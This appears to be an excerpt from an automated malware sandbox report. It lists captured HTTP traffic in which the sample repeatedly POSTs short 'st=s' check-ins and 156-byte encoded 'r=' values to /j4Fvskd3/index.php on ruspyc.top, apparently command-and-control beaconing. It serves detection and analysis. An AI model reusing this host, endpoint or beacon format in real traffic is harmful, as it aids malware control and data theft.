Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
